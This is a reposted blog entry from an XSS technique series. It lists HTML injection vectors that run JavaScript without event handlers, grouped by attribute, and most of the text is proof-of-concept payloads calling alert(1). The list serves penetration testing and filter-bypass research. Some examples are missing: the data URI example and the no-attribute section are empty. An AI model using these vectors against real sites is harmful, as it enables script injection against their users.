• 【XSS技巧拓展】————24、XSS Without Event Handlers

    There are some XSS attacks that don’t rely on our XSS payload scheme. These ones are based on a local or remote resource call. What we will see is not an exhaustive list and some require UI (user interaction) but they all are meant to work in latest Firefox and Chrome browsers until date except the ones marked with an asterisk (Firefox only).

    Our default javascript payload is “javascript:alert(1)” with few exceptions. It provides some room for obfuscation in case of a filter but it can be replaced by the data URI scheme:


    Because they are useful as alternatives to the event based ones, let’s group them regarding the attribute needed to trigger the alert:

    1) (no attribute)


    2) src

    <script src=javascript:alert(1)>
    <iframe src=javascript:alert(1)>
    <embed src=javascript:alert(1)> *

    3) href

    <a href=javascript:alert(1)>click
    <math><brute href=javascript:alert(1)>click *

    4) action

    <form action=javascript:alert(1)><input type=submit>
    <isindex action=javascript:alert(1) type=submit value=click> *

    5) formaction

    <form><button formaction=javascript:alert(1)>click
    <form><input formaction=javascript:alert(1) type=submit value=click>
    <form><input formaction=javascript:alert(1) type=image value=click>
    <form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>
    <isindex formaction=javascript:alert(1) type=submit value=click> *

    6) data

    <object data=javascript:alert(1)> *

    7) srcdoc

    <iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>

    8) xlink:href

    <svg><script xlink:href=data:,alert(1)></script>
    <svg><script xlink:href=data:,alert(1) /> *
    <math><brute xlink:href=javascript:alert(1)>click *

    9) from

    <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>

        <a href=javascript:alert(1)>, with “javascript” obfuscated and styled as a fake youtube video player.

    If you know any other vector, please let me know in comments and I will update this list.


    总会有不期而遇的温暖. 和生生不息的希望。
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  • 原文地址:https://www.cnblogs.com/devi1/p/13486391.html
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